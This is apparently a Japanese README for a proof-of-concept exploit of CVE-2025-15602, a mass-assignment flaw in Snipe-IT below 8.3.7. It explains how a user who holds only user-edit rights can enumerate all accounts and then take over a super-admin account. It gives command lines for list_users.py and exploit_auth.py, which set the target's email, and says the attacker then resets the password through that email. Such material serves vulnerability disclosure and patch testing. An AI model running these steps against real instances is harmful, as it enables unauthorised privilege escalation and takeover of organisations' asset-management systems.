
Snipe-IT < 8.3.7 のマスアサインメント脆弱性 - 権限昇格につながる
CVE-2025-15602-PoC は、Snipe-IT の脆弱性 CVE-2025-15602 に対する概念実証(PoC)です。 1つはすべてのユーザーを一覧表示するスクリプト、もう1つはスーパー管理者アカウントを乗っ取るスクリプトです。
ユーザー編集権限のみを持つユーザーが、その権限を悪用してユーザー一覧の取得やスーパー管理者アカウントの乗っ取りを行うことができます。
スクリプト内の BASE_URL を、お使いの snipe-it インスタンスに合わせて変更することを忘れないでください。
乗っ取りたいスーパー管理者の id を取得するために、インスタンス上のすべてのユーザーを一覧表示します。
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100
スクリプト内の BASE_URL を、お使いの snipe-it インスタンスに合わせて変更することを忘れないでください。
マスアサインメントを利用してスーパー管理者アカウントを乗っ取ります。
重要: 事前に list_users.py から正しい情報を取得する必要があります。取得しないと動作しません。id、username、first_name は対象アカウントと完全に一致している必要があります。
python3 exploit_auth.py \
--target-id 1 \
--admin-username admin \
--admin-firstname Admin \
--admin-email [email protected] \
--attacker-username your_user \
--attacker-password your_pass
その後、設定したメールアドレス経由でパスワードをリセットできます。
pip install requests beautifulsoup4